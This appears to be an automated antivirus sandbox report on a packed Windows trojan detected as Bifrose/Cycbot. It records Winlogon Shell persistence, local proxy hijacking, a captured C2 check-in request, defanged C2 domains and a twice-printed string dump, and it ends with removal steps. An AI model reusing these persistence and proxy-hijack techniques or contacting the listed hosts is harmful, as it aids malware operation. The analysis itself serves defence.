MD5: ff43ba54342b3c4978ed5131d51da812
SHA1: 8e13a23f21fa09dc413169a544fcb2f218e93d89
SHA256: d3b8226d0dc3c2584985fe90f54f0f3fa9b675f6521928bf2faad5ded652d8d5
SSDeep: 3072:0N1ugJyUE3eLbHGTqgJZJO/9V1OOUEpktiwcfDrhqhZxRhx:IrJtE3abHQqkwTOOUBEhrVqhZn/
Size: 171520 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-10-08 12:48:25
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:216
%original file name%.exe:404

The Trojan injects its code into the following process(es):

%original file name%.exe:880

Mutexes

The following mutexes were created/opened:

WininetProxyRegistryMutex
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex
c:!documents and settings!adm!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{45BCA615-C82A-4152-8857-BCC626AE4C8D}
RasPbFile
AMResourceMutex2

File activity

The process %original file name%.exe:880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe (85049 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPYV4HA7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EX4F27QP\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P2J9K5R3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (5088 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (3692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9Y7WTAZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (2668 bytes)

Registry activity

The process %original file name%.exe:216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 D2 E8 B9 E8 6B 57 EB 69 5F 3B C6 BB 4D 82 5E"

The process %original file name%.exe:404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C DB D1 3E E6 7E 0B 23 E4 19 14 81 41 6D 1A 12"

The process %original file name%.exe:880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:60667"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 B4 B7 1E 3A 90 1D 6D F6 4D 86 F3 53 9A BF 64"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
cba64cc2ba8b2ddc0bc01d6e5fa70506

URLs

URL	IP
hxxp://tri-countymech.com/g/livechat.png?pr=gwY92w4ARjI2H16rOzG6JI3RCjWnjV9Cq6m9XbHInTiwGxXhBe+p6Ay+fdvDdEgHQpyO+PtVGrEQTGr2Vjo/yitt4klJXwNvNVFMhRnnUyXeV7by0JtGZ2Pk2+fB6grCIHG/nqcG7xCj0ZReFZ1GXGBt/0F0uejJoIet4i07hwumXo1CwbnGVYqQ9OBpcwdKXe1g8BYNw2CvowukcXsO51zTXT4oqfAQ8RyfbPwEONnGO4lOzVrmtlEA0N	184.168.221.25
hxxp://www.google.com/	173.194.113.208

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Bifrose/Cycbot Checkin 2

Traffic

GET /g/livechat.png?pr=gwY92w4ARjI2H16rOzG6JI3RCjWnjV9Cq6m9XbHInTiwGxXhBe+p6Ay+fdvDdEgHQpyO+PtVGrEQTGr2Vjo/yitt4klJXwNvNVFMhRnnUyXeV7by0JtGZ2Pk2+fB6grCIHG/nqcG7xCj0ZReFZ1GXGBt/0F0uejJoIet4i07hwumXo1CwbnGVYqQ9OBpcwdKXe1g8BYNw2CvowukcXsO51zTXT4oqfAQ8RyfbPwEONnGO4lOzVrmtlEA0N HTTP/1.0

Connection: close

Host: tri-countymech.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 302 Found

Connection: close

Pragma: no-cache

cache-control: no-cache

Location: /g/livechat.png?pr=gwY92w4ARjI2H16rOzG6JI3RCjWnjV9Cq6m9XbHInTiwGxXhBe+p6Ay+fdvDdEgHQpyO+PtVGrEQTGr2Vjo/yitt4klJXwNvNVFMhRnnUyXeV7by0JtGZ2Pk2+fB6grCIHG/nqcG7xCj0ZReFZ1GXGBt/0F0uejJoIet4i07hwumXo1CwbnGVYqQ9OBpcwdKXe1g8BYNw2CvowukcXsO51zTXT4oqfAQ8RyfbPwEONnGO4lOzVrmtlEA0N

The Trojan connects to the servers at the folowing location(s):

`.rsrc

PSShT

SSj%S

<%u,V

<3%u1f

cmd.exe

GetProcessWindowStation

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

>`Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d Function Prototypes found.

Including %d Library Functions.

.bss align=16

copy /b data.tmp   bss.tmp   code.tmp %s

copy /b code.tmp   data.tmp   bss.tmp %s

del *.tmp

copy /b data.tmp   code.tmp %s

al,%s

eax,%s

%s is not valid in:

Warning - Return from non-void function %s with no value

elend

.text

Warning -- "break" not supported in:

Error: %s not defined!

.data align=16

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

hXXp://

%s.%s

stor.cfg

exec%s

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=108

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

hXXp://maildbaccesss.com

hXXp://storetabletpcforme.com

hXXp://seeworldonlines.com

hXXp://missisipitour.com

hXXp://adreklamaforyou.com

hXXp://calcfordelis.com

hXXp://stotre4image.com

hXXp://allsoft4you.com

hXXp://videocontainer.com

hXXp://maxtroeurosys.com

SELECT_RESERV_SRV_%d

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

%sq=%s

DWN_CON_STRP_%d_%s

hXXp://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?tq=%s&pr=%d

%s:%d/%s?tq=%s&pr=%d

hXXp://armoredlegion.com/305986.png

hXXp://armoredlegion.com/16354.png

hXXp://armoredlegion.com/716354_m61.png

hXXp://mektek.net/thelab/wiley.jpg

hXXp://knowledgesutra.com/img/temp/hi.cgi

hXXp://knowledgesutra.com/img/temp/head.png

hXXp://battleon.com/134.gif

hXXp://battleon.com/132.gif

hXXp://battleon.com/133.gif

hXXp://browsermmorpg.com/images/cpc.png

hXXp://browsermmorpg.com/images/cpc2.png

hXXp://browsermmorpg.com/img/intel.gif

hXXp://browsermmorpg.com/img/intel.jpg

hXXp://012webpages.com/christian12.jpg

hXXp://012webpages.com/christian13.jpg

hXXp://012webpages.com/christian14.jpg

hXXp://tri-countymech.com/g/livechat.png

hXXp://tri-countymech.com/g/logo.png

hXXp://tri-countymech.com/g/133.jpg

hXXp://tri-countymech.com/g/134.jpg

hXXp://electronicstheory.com/pics/valley.png

hXXp://electronicstheory.com/pics/sun.png

hXXp://classicbattletech.com/lhous3.gif

hXXp://classicbattletech.com/lhous4.gif

hXXp://classicbattletech.com/lhous5.gif

hXXp://classicbattletech.com/lhous6.gif

hXXp://engineeringcrossing.com/images/misc/23525.png

hXXp://engineeringcrossing.com/images/misc/64646.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?pr=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

GET %s HTTP/1.0

Host: %s

User-Agent: mozilla/2.0

drweb

{5A92A751-F926-4BB9-872E-BEC4A4CD571F}

ldr.ini

reportfrommains.com

hXXp://%s/s.php?c=121&id=%s

onlinereportsystem.com

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

127.0.0.1

HTTP/1.x

google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Opera

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

HTTP/1.0 200 OK

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

&useragent=%s

&referer=%s

&type=%d

%s:443/?ver=108&system=%d&id=%s&hwid=%s&search=%s

%s_2_%s

%s_%s_%s

%s_3_%s

VVV.VVV.ru

hXXps://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

User-Agent: chrome/9.0

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

c:\%original file name%.exe

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\B375

GetCPInfo

RegFlushKey

RegOpenKeyExA

RegCloseKey

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpCloseHandle

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

`.rdata

@.data

.rsrc

oB.dX

gqKey

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

2.0.2.1

%original file name%.exe_880_rwx_00209000_00001000:

%Documents and Settings%\%current user%\Local Settings\History\History.IE5\

CryptSIPDllGetSignedDataMsg

CryptSIPDllRemoveSignedDataMsg

CryptDllExportPublicKeyInfoEx

CryptDllImportPublicKeyInfoEx

%Documents and Settings%\%current user%\Local Settings\History

%original file name%.exe_880_rwx_00400000_0008D000:

`.rsrc

PSShT

SSj%S

<%u,V

<3%u1f

cmd.exe

GetProcessWindowStation

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

>`Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d Function Prototypes found.

Including %d Library Functions.

.bss align=16

copy /b data.tmp   bss.tmp   code.tmp %s

copy /b code.tmp   data.tmp   bss.tmp %s

del *.tmp

copy /b data.tmp   code.tmp %s

al,%s

eax,%s

%s is not valid in:

Warning - Return from non-void function %s with no value

elend

.text

Warning -- "break" not supported in:

Error: %s not defined!

.data align=16

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

%s%s_1

%s_0_%d_%s

%s_%d

%s_%d_%d_%d_%d

%s_%s

hXXp://

%s.%s

stor.cfg

exec%s

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=108

%s_%s_%d

_1_%d

_2_%d

_3_%d

_4_%d

hXXp://maildbaccesss.com

hXXp://storetabletpcforme.com

hXXp://seeworldonlines.com

hXXp://missisipitour.com

hXXp://adreklamaforyou.com

hXXp://calcfordelis.com

hXXp://stotre4image.com

hXXp://allsoft4you.com

hXXp://videocontainer.com

hXXp://maxtroeurosys.com

SELECT_RESERV_SRV_%d

%s_%d_%s

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d

%s %s

%s start%s%c%s

c1.exe

c2.exe

c3.exe

%sq=%s

DWN_CON_STRP_%d_%s

hXXp://%d.ctrl.%s

logo.png

img/135.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?tq=%s&pr=%d

%s:%d/%s?tq=%s&pr=%d

hXXp://armoredlegion.com/305986.png

hXXp://armoredlegion.com/16354.png

hXXp://armoredlegion.com/716354_m61.png

hXXp://mektek.net/thelab/wiley.jpg

hXXp://knowledgesutra.com/img/temp/hi.cgi

hXXp://knowledgesutra.com/img/temp/head.png

hXXp://battleon.com/134.gif

hXXp://battleon.com/132.gif

hXXp://battleon.com/133.gif

hXXp://browsermmorpg.com/images/cpc.png

hXXp://browsermmorpg.com/images/cpc2.png

hXXp://browsermmorpg.com/img/intel.gif

hXXp://browsermmorpg.com/img/intel.jpg

hXXp://012webpages.com/christian12.jpg

hXXp://012webpages.com/christian13.jpg

hXXp://012webpages.com/christian14.jpg

hXXp://tri-countymech.com/g/livechat.png

hXXp://tri-countymech.com/g/logo.png

hXXp://tri-countymech.com/g/133.jpg

hXXp://tri-countymech.com/g/134.jpg

hXXp://electronicstheory.com/pics/valley.png

hXXp://electronicstheory.com/pics/sun.png

hXXp://classicbattletech.com/lhous3.gif

hXXp://classicbattletech.com/lhous4.gif

hXXp://classicbattletech.com/lhous5.gif

hXXp://classicbattletech.com/lhous6.gif

hXXp://engineeringcrossing.com/images/misc/23525.png

hXXp://engineeringcrossing.com/images/misc/64646.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

%s?pr=%s

\bl%d_64.bat

del "%s"

if exist "%s" goto a

cmd.exe /c "%s"

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

GET %s HTTP/1.0

Host: %s

User-Agent: mozilla/2.0

drweb

{5A92A751-F926-4BB9-872E-BEC4A4CD571F}

ldr.ini

reportfrommains.com

hXXp://%s/s.php?c=121&id=%s

onlinereportsystem.com

%s_1_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

u.exe

%s up%s

&%s=%s

avgnt.exe

AVGIDSAgent.exe

avgwdsvc.exe

ccsvchst.exe

AvastUI.exe

mcagent.exe

PRM_LSTN_THIS_PORT

127.0.0.1

HTTP/1.x

google.com

hXXp://VVV.google.com

HTTP/1.1 302 Found

Location: %s

id=%s&type=%d&ppcid=%s

%s: %s

%s_5_%s

http=127.0.0.1:

prefs.js

Mozilla

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.type"

"127.0.0.1"

%s(%s, %s);

operaprefs.ini

Opera

Use HTTP

HTTP server

127.0.0.1:%s

%s=%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

exec|%s

http=

HTTP/1.0 200 OK

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

bing.com

yahoo.com

search.aol.

suche.aol.

searcht2.aol.

.yimg.com

.bing.net

scorecardresearch.com

brightcove.com

.aol.

.atwola.

.ivwbox.

.google

.atdmt.

.abmr.

.tacoda.

.adtechus.

.autodatadirect.

.mapquestapi.

.ggpht.

.virtualearth.

.opera.

.microsoft.

.wsod.

.doubleclick.

.ypcdn.

.truveo.

.tlowdb.

mapq.st

.dartsearch.

.thawte.

http://

bing.com/search

search.yahoo.com/search

%s_1_%s

err%d%s_%d_%d

err0%s_%d_%d

&useragent=%s

&referer=%s

&type=%d

%s:443/?ver=108&system=%d&id=%s&hwid=%s&search=%s

%s_2_%s

%s_%s_%s

%s_3_%s

VVV.VVV.ru

hXXps://

.doubleclick.net

doubleclick.net

msn.com

%s_0%d_%d

=='undefined'?'%s':'%s'

.referrer

HTTP/1.0

User-Agent: chrome/9.0

%s %s %s

hXXp://VVV.google.com/

hXXp://VVV.yahoo.com/

.class

.midi

google_ad.url

google_ad.title

r.msn.com

google_ad.line1

zcÁ

c:\%original file name%.exe

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\B375

GetCPInfo

RegFlushKey

RegOpenKeyExA

RegCloseKey

WinHttpReadData

WinHttpOpenRequest

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpCloseHandle

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

`.rdata

@.data

.rsrc

oB.dX

gqKey

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

KERNEL32.DLL

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

RPCRT4.dll

SHELL32.dll

SHLWAPI.dll

USER32.dll

WINHTTP.dll

WININET.dll

WS2_32.dll

mscoree.dll

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Dr.Web

mhttp=127.0.0.1:%d

hXXp://VVV.yahoo.com

2.0.2.1

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:216
   %original file name%.exe:404
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
   %Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe (85049 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CPYV4HA7\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EX4F27QP\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P2J9K5R3\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\NTUSER.DAT.LOG (5088 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9Y7WTAZ\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (2668 bytes)

4. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
   "Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.